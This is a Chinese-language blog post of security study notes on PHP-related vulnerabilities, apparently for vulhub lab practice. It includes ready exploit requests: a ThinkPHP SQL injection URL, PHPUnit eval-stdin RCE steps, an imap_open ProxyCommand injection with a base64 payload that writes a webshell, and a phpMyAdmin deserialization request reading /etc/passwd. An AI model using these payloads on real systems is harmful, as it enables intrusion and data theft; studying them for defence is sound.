M0nk3y's Blog

PHP CVE、ThinkPHP、PhpMyAdmin、PHP 安全学习笔记

Word count: 723Reading time: 3 min
2020/08/25 Share

[TOC]

资料来源于网络, 仅用作学习记录。本笔记还未完成,正重新整理中。

PHP CVE、ThinkPHP、PhpMyAdmin 、PHP安全学习

ThinkPHP5 SQL注入漏洞(一) && 敏感信息泄露

https://github.com/vulhub/vulhub/tree/master/thinkphp/in-sqlinjection
https://xz.aliyun.com/t/125

1
http://your-ip/index.php?ids[]=1&ids[]=2

PHP-FPM 远程代码执行漏洞(CVE-2019-11043)

利用工具:https://github.com/neex/phuip-fpizdam

注意,因为php-fpm会启动多个子进程,在访问/index.php?a=id时需要多访问几次,以访问到被污染的进程。

PHPUnit CVE-2017-9841

composer是php包管理工具,使用composer安装扩展包将会在当前目录创建一个vendor文件夹,并将所有文件放在其中。通常这个目录需要放在web目录外,使用户不能直接访问。

phpunit是php中的单元测试工具,其4.8.19 ~ 4.8.27和5.0.10 ~ 5.6.2版本的vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 文件有如下代码:

1
eval('?>'.file_get_contents('php://input'));

如果该文件被用户直接访问到,将造成远程代码执行漏洞。

POST 方法请求:vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

在Body 输入要执行的PHP 代码

PHP imap 远程命令执行漏洞(CVE-2018-19518)

php imap扩展用于在PHP中执行邮件收发操作。其imap_open函数会调用rsh来连接远程shell,而debian/ubuntu中默认使用ssh来代替rsh的功能(也就是说,在debian系列系统中,执行rsh命令实际执行的是ssh命令)。

因为ssh命令中可以通过设置-oProxyCommand=来调用第三方命令,攻击者通过注入注入这个参数,最终将导致命令执行漏洞。

写入Webshell: phpinfo,访问/a.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
POST / HTTP/1.1
Host: ****
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 142
Origin: ****
Connection: close
Referer: ****
Upgrade-Insecure-Requests: 1

hostname=x+-oProxyCommand%3decho%09ZWNobyAnPD9waHAgcGhwaW5mbygpOz8%2BJz4vdmFyL3d3dy9odG1sL2EucGhw%3d|base64%09-d|sh}&username=111&password=222

PHP-FPM Fastcgi 未授权访问漏洞

PHP-CGI远程代码执行漏洞(CVE-2012-1823)

https://github.com/vulhub/vulhub/tree/master/php/CVE-2012-1823

uWSGI PHP目录穿越漏洞(CVE-2018-7490)

PHP XDebug RCE

PHPMYADMIN WooYun-2016-199433

phpmyadmin 2.x版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码。

1
2
3
4
5
6
7
8
9
10
11
POST /scripts/setup.php HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 80

action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}

Author:m0nk3y

原文链接:https://hack-for.fun/56cfbe5.html

发表日期:August 25th 2020, 11:48:53 pm

更新日期:September 13th 2020, 7:33:05 pm

版权声明:原创文章转载时请注明出处

CATALOG
  1. 1. PHP CVE、ThinkPHP、PhpMyAdmin 、PHP安全学习
    1. 1.1. ThinkPHP5 SQL注入漏洞(一) && 敏感信息泄露
    2. 1.2. PHP-FPM 远程代码执行漏洞(CVE-2019-11043)
    3. 1.3. PHPUnit CVE-2017-9841
    4. 1.4. PHP imap 远程命令执行漏洞(CVE-2018-19518)
    5. 1.5. PHP-FPM Fastcgi 未授权访问漏洞
    6. 1.6. PHP-CGI远程代码执行漏洞(CVE-2012-1823)
    7. 1.7. uWSGI PHP目录穿越漏洞(CVE-2018-7490)
    8. 1.8. PHP XDebug RCE
    9. 1.9. PHPMYADMIN WooYun-2016-199433